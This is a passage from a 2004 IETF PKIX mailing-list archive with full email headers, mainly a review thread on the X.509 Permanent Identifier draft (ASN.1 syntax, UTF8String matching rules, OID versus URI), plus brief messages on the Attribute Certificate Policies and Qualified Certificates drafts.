the same CA or from different CA's contain both the same permanent identifier value and the same identifier type value, then these certificates relate to the same entity, whatever the content of the DN or other subjectAltName components may be. > 4. Section 2: What is the criteria for use of iA5String vs > uTF8String? Good question. No good answer ! I thus propose to simplify and just have the following: PermanentIdentifier ::= SEQUENCE { identifierValue UTF8String, identifierType OBJECT IDENTIFIER OPTIONAL } Here is the new text for UTF8. The IdentifierValue supports one syntax: UTF8String. UTF8String is variable length data of octets. The UTF8String syntax is used to express a string of characters from the Universal Character Set - UCS [ISO10646] (a superset of [Unicode]), encoded following the [UTF-8] algorithm. The UCS allows support of most of the world's writing systems using a single character set. Note that Unicode characters U+0000 through U+007F are the same as ASCII 0 through 127, respectively, and have the same single octet UTF-8 encoding. Other Unicode characters have a multiple octet UTF-8 encoding. > 5. Section 2: When doing comparisons do I need to cross compare > these two different value items? Added the following: The following matching rule SHALL be used for the identifierValue: the rule evaluates to TRUE if and only if the code points [Unicode] of each of the characters is equal. Also added the following references: [Unicode] The Unicode Consortium, "The Unicode Standard, Version 3.2.0" is defined by "The Unicode Standard, Version 3.0" (Reading, MA, Addison-Wesley, 2000. ISBN 0-201-61633-5), as amended by the "Unicode Standard Annex #27: Unicode 3.1" (http://www.unicode.org/reports/tr27/) and by the "Unicode Standard Annex #28: Unicode 3.2" (http://www.unicode.org/reports/tr28/). [ISO10646] Universal Multiple-Octet Coded Character Set (UCS) - Architecture and Basic Multilingual Plane, ISO/IEC 10646-1: 1993. [UTF-8] RFC 2279. F. Yergeau. UTF-8, a transformation format of ISO 10646, January 1998. > 6. Section 2: The statement 'It is an OID.' is redundant and can be > removed. OK. Forgotten. > 7. Section 3: Contains a paragraph dealing with matching rules. > Since this is no longer a field in the structure the paragraph should > be re-written to state what the one and only matching rule is. See the response to the issue number 5. > 8. Appendix A.1: New request, please put a reference to the document > containing the pkix module into the pkix document (i.e. something like > "-- found in [RFC 3280]". This prevents documents from importing > modules that are lower in the standards process without having any > explicit reference to them. Added: -- from [RFC 3280] Before I update the document and place it on the web server, I would be grateful to get your response on these proposals. Denis > jim > > > >>-----Original Message----- >>From: owner-ietf-pkix@mail.imc.org >>[mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of >>Internet-Drafts@ietf.org >>Sent: Wednesday, January 21, 2004 1:27 PM >>To: IETF-Announce: >>Cc: ietf-pkix@imc.org >>Subject: I-D ACTION:draft-ietf-pkix-pi-08.txt >> >> >>A New Internet-Draft is available from the on-line >>Internet-Drafts directories. This draft is a work item of the >>Public-Key Infrastructure (X.509) Working Group of the IETF. >> >> Title : Internet X.509 Public Key >>Infrastructure Permanent Identifier >> Author(s) : D. Pinkas, T. Gindin >> Filename : draft-ietf-pkix-pi-08.txt >> Pages : 12 >> Date : 2004-1-21 >> >>This document define a new form of name, called permanent >>identifier, that may be included in the subjectAltName extension >>of a public key certificate issued to an entity. >>The permanent identifier is an optional feature that may be used >>by a CA to indicate that the certificate relates to the same >>entity even if the name or the affiliation of that entity stored >>in the subject or another name form in the subjectAltName extension >>has changed. >>The subject name, carried in the subject field, is only unique >>for each subject entity certified by the one CA as defined by the >>issuer name field. Also, the new name form can carry a >>name that is unique for each subject entity certified by a CA. >> >>A URL for this Internet-Draft is: >>http://www.ietf.org/internet-drafts/draft-> ietf-pkix-pi-08.txt >> >> >>To remove yourself from the IETF >>Announcement list, send a message to >>ietf-announce-request with the word unsubscribe in the body >>of the message. >> >>Internet-Drafts are also available by anonymous FTP. Login >>with the username "anonymous" and a password of your e-mail >>address. After logging in, type "cd internet-drafts" and then >> "get draft-ietf-pkix-pi-08.txt". >> >>A list of Internet-Drafts directories can be found in > > http://www.ietf.org/shadow.html > or ftp://ftp.ietf.org/ietf/1shadow-sites.txt > > > Internet-Drafts can also be obtained by e-mail. > > Send a message to: > mailserv@ietf.org. > In the body type: > "FILE /internet-drafts/draft-ietf-pkix-pi-08.txt". > > NOTE: The mail server at ietf.org can return the document in > MIME-encoded form by using the "mpack" utility. To use this > feature, insert the command "ENCODING mime" before the "FILE" > command. To decode the response(s), you will need "munpack" or > a MIME-compliant mail reader. Different MIME-compliant mail readers > exhibit different behavior, especially when dealing with > "multipart" MIME messages (i.e. documents which have been split > up into multiple messages), so check your local documentation on > how to manipulate these messages. > > > Below is the data which will enable a MIME compliant mail reader > implementation to automatically retrieve the ASCII version of the > Internet-Draft. > > Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0NENEib000501; Fri, 23 Jan 2004 06:23:14 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0NENE9L000500; Fri, 23 Jan 2004 06:23:14 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from edelweb.fr (edelweb.fr [212.234.46.16]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0NENCib000487 for <ietf-pkix@imc.org>; Fri, 23 Jan 2004 06:23:12 -0800 (PST) (envelope-from Peter.Sylvester@EdelWeb.fr) Received: from chandon.edelweb.fr (localhost.edelweb.fr [127.0.0.1]) by edelweb.fr with ESMTP id PAA16056; Fri, 23 Jan 2004 15:23:07 +0100 (MET) Received: from chandon.edelweb.fr (chandon.edelweb.fr [193.51.14.162]) by edelweb.fr (nospam/1.7); Fri, 23 Jan 2004 15:23:07 +0100 (MET) Received: (from peter@localhost) by chandon.edelweb.fr (8.11.7p1+Sun/8.11.7) id i0NEN5t26589; Fri, 23 Jan 2004 15:23:05 +0100 (MET) Date: Fri, 23 Jan 2004 15:23:05 +0100 (MET) From: Peter Sylvester <Peter.Sylvester@EdelWeb.fr> Message-Id: <200401231423.i0NEN5t26589@chandon.edelweb.fr> To: jimsch@exmsft.com, Denis.Pinkas@bull.net Subject: Re: I-D ACTION:draft-ietf-pkix-pi-08.txt Cc: tgindin@us.ibm.com, ietf-pkix@imc.org X-Sun-Charset: US-ASCII Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> > Here is the new text for UTF8. > > The IdentifierValue supports one syntax: UTF8String. UTF8String is > variable length data of octets. The UTF8String syntax is used to > express a string of characters from the Universal Character Set > - UCS [ISO10646] (a superset of [Unicode]), encoded following the > [UTF-8] algorithm. The UCS allows support of most of the world's > writing systems using a single character set. > > Note that Unicode characters U+0000 through U+007F are the same as > ASCII 0 through 127, respectively, and have the same single octet > UTF-8 encoding. Other Unicode characters have a multiple octet > UTF-8 encoding. > I think you can simply remove all this. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0NDEYib097779; Fri, 23 Jan 2004 05:14:34 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0NDEY2l097778; Fri, 23 Jan 2004 05:14:34 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from odin2.bull.net (odin2.bull.net [192.90.70.84]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0NDEVib097765 for <ietf-pkix@imc.org>; Fri, 23 Jan 2004 05:14:32 -0800 (PST) (envelope-from Denis.Pinkas@bull.net) Received: from clbull.frcl.bull.fr (IDENT:root@clbull.frcl.bull.fr [129.182.8.31]) by odin2.bull.net (8.9.3/8.9.3) with ESMTP id OAA08958; Fri, 23 Jan 2004 14:21:57 +0100 Received: from bull.net (frcls4013.frcl.bull.fr [129.182.108.120]) by clbull.frcl.bull.fr (8.9.3/8.9.3) with ESMTP id PAA24617; Fri, 23 Jan 2004 15:09:36 +0100 Message-ID: <40111E2D.70605@bull.net> Date: Fri, 23 Jan 2004 14:14:21 +0100 From: Denis Pinkas <Denis.Pinkas@bull.net> Organization: Bull SA. User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0 X-Accept-Language: en-us, en, fr MIME-Version: 1.0 To: jimsch@exmsft.com CC: "'Tom Gindin'" <tgindin@us.ibm.com>, ietf-pkix@imc.org Subject: Re: I-D ACTION:draft-ietf-pkix-pi-08.txt References: <005701c3e08e$9b392fe0$1400a8c0@augustcellars.local> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Jim, Thank you for your document quality checking. > Comments on draft -08. > > 1. Privacy concerns should be additionally outlined and covered in the > security considerations section. This point is already covered. Here is the text : The permanent identifier allows organizations to create links between different certificates associated with an entity issued with or without overlapping validity periods. This ability to link different certificates may conflict with privacy. It is therefore important that a CA clearly disclose any plans to issue certificates which include a permanent identifier to potential subjects of those certificates. > 2. Section 1, para 9: Text here allows for an AA to have a unique URI > name. Has been removed from the syntax. You were so fast by replying to the publication, that I had not the time to advertise the main reason for issuing this new draft. It is because the IESG objected to include URI in the document and that we (i.e. Tom and myself) have been unable to find a compromise with the IESG. So we have removed the URI option. You are correct: this sentence should have been deleted. Done. > 3. Section 1, para 14: Suggested text "both the same permanent > identifier value and the same Authority Identifer Value, then these". > (I find the use of identityType to be confusing since I consider this to > relate to type choice of IdentifierValue as well.) "identityType" is not used. "identifierType" is used instead. The ASN.1 for identifierType is : identifierType OBJECT IDENTIFIER OPTIONAL The current text is: "When two certificates from different CA's contain both the same permanent identifier value and the same type of permanent identifier from a given Assigner Authority, then these certificates relate to the same entity, whatever the content of the DN or other subjectAltName components may be." Changing "same type of permanent identifier" by "Authority Identifer Value" would not be appropriate. The identifierType does not simply identify the Authority, but also the type of identifier being used. I would propose the following text: When two certificates from the same CA or from different CA's contain both the same permanent identifier value and the same identifier type value, then these certificates relate to the same entity, whatever the content of the DN or other subjectAltName components may be. > 4. Section 2: What is the criteria for use of iA5String vs uTF8String? Good question. No good answer ! I thus propose to simplify and just have the following: PermanentIdentifier ::= SEQUENCE { identifierValue UTF8String, identifierType OBJECT IDENTIFIER OPTIONAL } Here is the new text for UTF8. The IdentifierValue supports one syntax: UTF8String. UTF8String is variable length data of octets. The UTF8String syntax is used to express a string of characters from the Universal Character Set - UCS [ISO10646] (a superset of [Unicode]), encoded following the [UTF-8] algorithm. The UCS allows support of most of the world's writing systems using a single character set. Note that Unicode characters U+0000 through U+007F are the same as ASCII 0 through 127, respectively, and have the same single octet UTF-8 encoding. Other Unicode characters have a multiple octet UTF-8 encoding. > 5. Section 2: When doing comparisons do I need to cross compare these > two different value items? Added the following: The following matching rule SHALL be used for the identifierValue: the rule evaluates to TRUE if and only if the code points [Unicode] of each of the characters is equal. Also added the following references: [Unicode] The Unicode Consortium, "The Unicode Standard, Version 3.2.0" is defined by "The Unicode Standard, Version 3.0" (Reading, MA, Addison-Wesley, 2000. ISBN 0-201-61633-5), as amended by the "Unicode Standard Annex #27: Unicode 3.1" (http://www.unicode.org/reports/tr27/) and by the "Unicode Standard Annex #28: Unicode 3.2" (http://www.unicode.org/reports/tr28/). [ISO10646] Universal Multiple-Octet Coded Character Set (UCS) - Architecture and Basic Multilingual Plane, ISO/IEC 10646-1: 1993. [UTF-8] RFC 2279. F. Yergeau. UTF-8, a transformation format of ISO 10646, January 1998. > 6. Section 2: The statement 'It is an OID.' is redundant and can be > removed. OK. Forgotten. > 7. Section 3: Contains a paragraph dealing with matching rules. Since > this is no longer a field in the structure the paragraph should be > re-written to state what the one and only matching rule is. See the response to the issue number 5. > 8. Appendix A.1: New request, please put a reference to the document > containing the pkix module into the pkix document (i.e. something like > "-- found in [RFC 3280]". This prevents documents from importing > modules that are lower in the standards process without having any > explicit reference to them. Added: -- from [RFC 3280] Before I update the document and place it on the web server, I would be grateful to get your response on these proposals. Denis > jim > > > >>-----Original Message----- >>From: owner-ietf-pkix@mail.imc.org >>[mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of >>Internet-Drafts@ietf.org >>Sent: Wednesday, January 21, 2004 1:27 PM >>To: IETF-Announce: >>Cc: ietf-pkix@imc.org >>Subject: I-D ACTION:draft-ietf-pkix-pi-08.txt >> >> >>A New Internet-Draft is available from the on-line >>Internet-Drafts directories. This draft is a work item of the >>Public-Key Infrastructure (X.509) Working Group of the IETF. >> >> Title : Internet X.509 Public Key >>Infrastructure Permanent Identifier >> Author(s) : D. Pinkas, T. Gindin >> Filename : draft-ietf-pkix-pi-08.txt >> Pages : 12 >> Date : 2004-1-21 >> >>This document define a new form of name, called permanent >>identifier, that may be included in the subjectAltName extension >>of a public key certificate issued to an entity. >>The permanent identifier is an optional feature that may be used >>by a CA to indicate that the certificate relates to the same >>entity even if the name or the affiliation of that entity stored >>in the subject or another name form in the subjectAltName extension >>has changed. >>The subject name, carried in the subject field, is only unique >>for each subject entity certified by the one CA as defined by the >>issuer name field. Also, the new name form can carry a >>name that is unique for each subject entity certified by a CA. >> >>A URL for this Internet-Draft is: >>http://www.ietf.org/internet-drafts/draft-> ietf-pkix-pi-08.txt >> >> >>To remove yourself from the IETF >>Announcement list, send a message to >>ietf-announce-request with the word unsubscribe in the body >>of the message. >> >>Internet-Drafts are also available by anonymous FTP. Login >>with the username "anonymous" and a password of your e-mail >>address. After logging in, type "cd internet-drafts" and then >> "get draft-ietf-pkix-pi-08.txt". >> >>A list of Internet-Drafts directories can be found in > > http://www.ietf.org/shadow.html > or ftp://ftp.ietf.org/ietf/1shadow-sites.txt > > > Internet-Drafts can also be obtained by e-mail. > > Send a message to: > mailserv@ietf.org. > In the body type: > "FILE /internet-drafts/draft-ietf-pkix-pi-08.txt". > > NOTE: The mail server at ietf.org can return the document in > MIME-encoded form by using the "mpack" utility. To use this > feature, insert the command "ENCODING mime" before the "FILE" > command. To decode the response(s), you will need "munpack" or > a MIME-compliant mail reader. Different MIME-compliant mail > readers > exhibit different behavior, especially when dealing with > "multipart" MIME messages (i.e. documents which have been split > up into multiple messages), so check your local documentation on > how to manipulate these messages. > > > Below is the data which will enable a MIME compliant mail reader > implementation to automatically retrieve the ASCII version of the > Internet-Draft. > > Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0MJuLib077974; Thu, 22 Jan 2004 11:56:21 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0MJuLYd077973; Thu, 22 Jan 2004 11:56:21 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from av1-1-sn4.m-sp.skanova.net (av1-1-sn4.m-sp.skanova.net [81.228.10.116]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0MJuKib077964 for <ietf-pkix@imc.org>; Thu, 22 Jan 2004 11:56:20 -0800 (PST) (envelope-from anders.rundgren@telia.com) Received: by av1-1-sn4.m-sp.skanova.net (Postfix, from userid 502) id 5C48137E56; Thu, 22 Jan 2004 20:56:14 +0100 (CET) Received: from smtp2-2-sn4.m-sp.skanova.net (smtp2-2-sn4.m-sp.skanova.net [81.228.10.182]) by av1-1-sn4.m-sp.skanova.net (Postfix) with ESMTP id 4AA4D37E4E for <ietf-pkix@imc.org>; Thu, 22 Jan 2004 20:56:14 +0100 (CET) Received: from arport (t11o913p112.telia.com [213.64.28.112]) by smtp2-2-sn4.m-sp.skanova.net (Postfix) with SMTP id E189637E85; Thu, 22 Jan 2004 20:56:10 +0100 (CET) Message-ID: <00c701c3e121$0ae3af90$0500a8c0@arport> From: "Anders Rundgren" <anders.rundgren@telia.com> To: <jimsch@exmsft.com>, "'Denis Pinkas'" <Denis.Pinkas@bull.net>, "'Tom Gindin'" <tgindin@us.ibm.com> Cc: <ietf-pkix@imc.org> References: <005701c3e08e$9b392fe0$1400a8c0@augustcellars.local> Subject: Re: I-D ACTION:draft-ietf-pkix-pi-08.txt Date: Thu, 22 Jan 2004 20:50:50 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Well Jim, The PI-draft is certainly an odd creature that has been in PKIX's "custody" for now close to four(!) years. A few comments to PI in general and some draft-08 specific. Draft-08: identifierType "The IdentifierType field, when present, is an OID which identifies both the Assigner Authority and the type of that field. It is an OID" The words "type of that field" has never been explained. But we all know exactly what the authors' mean don't we? :-| Draft-08: identifierType has, as you noted been reduced to only support OIDs, probably due to the authors' belief that OIDs are more permanent. However, the rest of the computer industry have no problems using URIs making PI "incompatible" and "deviating". A URI also have the big advantage that it may point to a document. I find this "obsession" with permanence wrong, because if a CA disappears, its regitered DNS name is taken by somebody else, the certificates are anaway no longer usable and names may indeed be reused. That is, OID or URI is a deployment issue. At best you can RECOMMEND the "serious" implementer to use an OID. PI-General: During the PI development serialNumber has become the de-facto standard for keeping a permanent (or static which is really more what we are talking about) identifier. Anyway, PI-using relying party software have little reason to bother about PI as the existing systems I know of simply does not "decipher" certificates looking for the most "attractive" name form(?), they just _assume_ that things are as the CP says. Most of these CAs also obey to Anders' nowadays (in)famous "best practice CA formula": CA <=> Policy which makes identifierType redundant and also eliminating the need for additional Subject name forms like PI. Anders ----- Original Message ----- From: "Jim Schaad" <jimsch@nwlink.com> To: "'Denis Pinkas'" <Denis.Pinkas@bull.net>; "'Tom Gindin'" <tgindin@us.ibm.com> Cc: <ietf-pkix@imc.org> Sent: Thursday, January 22, 2004 03:22 Subject: RE: I-D ACTION:draft-ietf-pkix-pi-08.txt Comments on draft -08. 1. Privacy concerns should be additionally outlined and covered in the security considerations section. 2. Section 1, para 9: Text here allows for an AA to have a unique URI name. Has been removed from the syntax. 3. Section 1, para 14: Suggested text "both the same permanent identifier value and the same Authority Identifer Value, then these". (I find the use of identityType to be confusing since I consider this to relate to type choice of IdentifierValue as well.) 4. Section 2: What is the criteria for use of iA5String vs uTF8String? 5. Section 2: When doing comparisons do I need to cross compare these two different value items? 6. Section 2: The statement 'It is an OID.' is redundant and can be removed. 7. Section 3: Contains a paragraph dealing with matching rules. Since this is no longer a field in the structure the paragraph should be re-written to state what the one and only matching rule is. 8. Appendix A.1: New request, please put a reference to the document containing the pkix module into the pkix document (i.e. something like "-- found in [RFC 3280]". This prevents documents from importing modules that are lower in the standards process without having any explicit reference to them. jim > -----Original Message----- > From: owner-ietf-pkix@mail.imc.org > [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of > Internet-Drafts@ietf.org > Sent: Wednesday, January 21, 2004 1:27 PM > To: IETF-Announce: > Cc: ietf-pkix@imc.org > Subject: I-D ACTION:draft-ietf-pkix-pi-08.txt > > > A New Internet-Draft is available from the on-line > Internet-Drafts directories. This draft is a work item of the > Public-Key Infrastructure (X.509) Working Group of the IETF. > > Title : Internet X.509 Public Key > Infrastructure Permanent Identifier > Author(s) : D. Pinkas, T. Gindin > Filename : draft-ietf-pkix-pi-08.txt > Pages : 12 > Date : 2004-1-21 > > This document define a new form of name, called permanent > identifier, that may be included in the subjectAltName extension > of a public key certificate issued to an entity. > The permanent identifier is an optional feature that may be used > by a CA to indicate that the certificate relates to the same > entity even if the name or the affiliation of that entity stored > in the subject or another name form in the subjectAltName extension > has changed. > The subject name, carried in the subject field, is only unique > for each subject entity certified by the one CA as defined by the > issuer name field. Also, the new name form can carry a > name that is unique for each subject entity certified by a CA. > > A URL for this Internet-Draft is: > http://www.ietf.org/internet-drafts/draft-> ietf-pkix-pi-08.txt > > > To remove yourself from the IETF > Announcement list, send a message to > ietf-announce-request with the word unsubscribe in the body > of the message. > > Internet-Drafts are also available by anonymous FTP. Login > with the username "anonymous" and a password of your e-mail > address. After logging in, type "cd internet-drafts" and then > "get draft-ietf-pkix-pi-08.txt". > > A list of Internet-Drafts directories can be found in http://www.ietf.org/shadow.html or ftp://ftp.ietf.org/ietf/1shadow-sites.txt Internet-Drafts can also be obtained by e-mail. Send a message to: mailserv@ietf.org. In the body type: "FILE /internet-drafts/draft-ietf-pkix-pi-08.txt". NOTE: The mail server at ietf.org can return the document in MIME-encoded form by using the "mpack" utility. To use this feature, insert the command "ENCODING mime" before the "FILE" command. To decode the response(s), you will need "munpack" or a MIME-compliant mail reader. Different MIME-compliant mail readers exhibit different behavior, especially when dealing with "multipart" MIME messages (i.e. documents which have been split up into multiple messages), so check your local documentation on how to manipulate these messages. Below is the data which will enable a MIME compliant mail reader implementation to automatically retrieve the ASCII version of the Internet-Draft. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0MIeGib075640; Thu, 22 Jan 2004 10:40:16 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0MIeFLR075639; Thu, 22 Jan 2004 10:40:15 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from postmark.nist.gov (pushme.nist.gov [129.6.16.92]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0MIeCib075632 for <ietf-pkix@imc.org>; Thu, 22 Jan 2004 10:40:13 -0800 (PST) (envelope-from tim.polk@nist.gov) Received: from krdp8.nist.gov (krdp8.ncsl.nist.gov [129.6.54.113]) by postmark.nist.gov (8.12.5/8.12.5) with ESMTP id i0MId8jP001769; Thu, 22 Jan 2004 13:39:08 -0500 (EST) Message-Id: <5.1.0.14.2.20040122133434.0350a830@email.nist.gov> X-Sender: wpolk@email.nist.gov X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Thu, 22 Jan 2004 13:40:00 -0500 To: housley@vigilsec.com From: Tim Polk <tim.polk@nist.gov> Subject: forwarding AC Policies draft Cc: ietf-pkix@imc.org, kent@bbn.com, Denis Pinkas <Denis.Pinkas@bull.net>, "Christopher S. Francis" <Chris_S_Francis@Raytheon.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Russ, The Attribute Certificate Policies Extension draft has successfully completed Working Group Last Call. Please consider this draft for IETF Last Call and progression as a standards track document. The current draft is available from the Internet Drafts repository at http://www.ietf.org/internet-drafts/draft-ietf-pkix-acpolicies-extn-05.txt Thanks, Tim Polk Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0M4D1ib054975; Wed, 21 Jan 2004 20:13:01 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0M4D1Vc054974; Wed, 21 Jan 2004 20:13:01 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from mail-dub.microsoft.com (mail-dub.microsoft.com [213.199.128.160]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0M4Cwib054923 for <ietf-pkix@imc.org>; Wed, 21 Jan 2004 20:12:59 -0800 (PST) (envelope-from stefans@microsoft.com) Received: from dub-imc-01.europe.corp.microsoft.com ([65.53.196.35]) by mail-dub.microsoft.com with Microsoft SMTPSVC(5.0.2195.6713); Thu, 22 Jan 2004 04:12:55 +0000 Received: from 65.53.196.35 by dub-imc-01.europe.corp.microsoft.com (InterScan E-Mail VirusWall NT); Thu, 22 Jan 2004 04:12:55 -0000 Received: from EUR-MSG-03.europe.corp.microsoft.com ([65.53.192.44]) by dub-imc-01.europe.corp.microsoft.com with Microsoft SMTPSVC(5.0.2195.6713); Thu, 22 Jan 2004 04:12:55 +0000 X-MimeOLE: Produced By Microsoft Exchange V6.5.7122.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Subject: RE: I-D ACTION:draft-ietf-pkix-sonof3039-03.txt Date: Thu, 22 Jan 2004 04:12:52 -0000 Message-ID: <0C3042E92D8A714783E2C44AB9936E1DAE1DE5@EUR-MSG-03.europe.corp.microsoft.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: I-D ACTION:draft-ietf-pkix-sonof3039-03.txt Thread-Index: AcPgls0Ne44FneauQIejMrC4zCgajAABvADg From: "Stefan Santesson" <stefans@microsoft.com> To: <jimsch@exmsft.com>, "Tim Polk" <tim.polk@nist.gov>, "Nystrom, Magnus" <magnus@rsasecurity.com> Cc: <ietf-pkix@imc.org> X-OriginalArrivalTime: 22 Jan 2004 04:12:55.0678 (UTC) FILETIME=[030771E0:01C3E09E] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by above.proper.com id i0M4Cxib054964 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Thanks Jim, These editorial issues will be fixed /Stefan > -----Original Message----- > From: Jim Schaad [mailto:jimsch@nwlink.com] > Sent: den 21 januari 2004 19:25 > To: Stefan Santesson; 'Tim Polk'; 'Nystrom, Magnus' > Cc: ietf-pkix@imc.org > Subject: RE: I-D ACTION:draft-ietf-pkix-sonof3039-03.txt > > Comments on this draft. > > > 1. Section 2, para 2: > The text "where the certificate meet some qualification > requirements" should be changed to either "certificates meet" or > "certificate meets" (grammer) > > 2. You need to update your example certificate, the DOB is no longer > formed correctly. > > 3. I suggest not including a nameRegistrationAuthority in the example > certificate to illistrate how a certificate complient to this document > is created. > > jim > > > -----Original Message----- > > From: owner-ietf-pkix@mail.imc.org > > [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of > > Internet-Drafts@ietf.org > > Sent: Tuesday, January 20, 2004 12:45 PM > > To: IETF-Announce: > > Cc: ietf-pkix@imc.org > > Subject: I-D ACTION:draft-ietf-pkix-sonof3039-03.txt > > > > > > A New Internet-Draft is available from the on-line > > Internet-Drafts directories. This draft is a work item of the > > Public-Key Infrastructure (X.509) Working Group of the IETF. > > > > Title : Internet X.509 Public Key > > Infrastructure: Qualified Certificates Profile > > Author(s) : S. Santesson, M. Nystrom > > Filename : draft-ietf-pkix-sonof3039-03.txt > > Pages : 35 > > Date : 2004-1-20 > > > > This document forms a certificate profile, based on RFC 3280, for > > identity certificates issued to natural persons. > > > > The profile defines specific conventions for certificates that are > > qualified within a defined legal framework, named Qualified > > Certificates. The profile does however not define any legal > > requirements for such Qualified Certificates. > > > > The goal of this document is to define a certificate profile that > > supports issuance of Qualified Certificates independent of local > > legal requirements. The profile is however not limited to > > Qualified > > Certificates and further profiling may facilitate specific local > > needs. > > > > A URL for this Internet-Draft is: > > http://www.ietf.org/internet-drafts/draft-> ietf-pkix-sonof3039-03.txt > > > > To remove yourself from the IETF Announcement list, send a message to > > ietf-announce-request with the word unsubscribe in the body > > of the message. > > > > Internet-Drafts are also available by anonymous FTP. Login > > with the username "anonymous" and a password of your e-mail > > address. After logging in, type "cd internet-drafts" and then > > "get draft-ietf-pkix-sonof3039-03.txt". > > > > A list of Internet-Drafts directories can be found in > http://www.ietf.org/shadow.html > or ftp://ftp.ietf.org/ietf/1shadow-sites.txt > > > Internet-Drafts can also be obtained by e-mail. > > Send a message to: > mailserv@ietf.org. > In the body type: > "FILE /internet-drafts/draft-ietf-pkix-sonof3039-03.txt". > > NOTE: The mail server at ietf.org can return the document in > MIME-encoded form by using the "mpack" utility. To use this > feature, insert the command "ENCODING mime" before the "FILE" > command. To decode the response(s), you will need "munpack" or > a MIME-compliant mail reader. Different MIME-compliant mail > readers > exhibit different behavior, especially when dealing with > "multipart" MIME messages (i.e. documents which have been split > up into multiple messages), so check your local documentation on > how to manipulate these messages. > > > Below is the data which will enable a MIME compliant mail reader > implementation to automatically retrieve the ASCII version of the > Internet-Draft. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0M3LNib051059; Wed, 21 Jan 2004 19:21:23 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0M3LNMC051058; Wed, 21 Jan 2004 19:21:23 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from smtp4.pacifier.net (smtp4.pacifier.net [64.255.237.174]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0M3LJib051048 for <ietf-pkix@imc.org>; Wed, 21 Jan 2004 19:21:20 -0800 (PST) (envelope-from jimsch@nwlink.com) Received: from ROMANS (ip237.132.dial-acs01.sea.iinet.com [209.20.132.237]) by smtp4.pacifier.net (Postfix) with ESMTP id 4E5326ABCB; Wed, 21 Jan 2004 19:21:21 -0800 (PST) Reply-To: <jimsch@exmsft.com> From: "Jim Schaad" <jimsch@nwlink.com> To: "'Stefan Santesson'" <stefans@microsoft.com>, "'Tim Polk'" <tim.polk@nist.gov>, "'Nystrom, Magnus'" <magnus@rsasecurity.com> Cc: 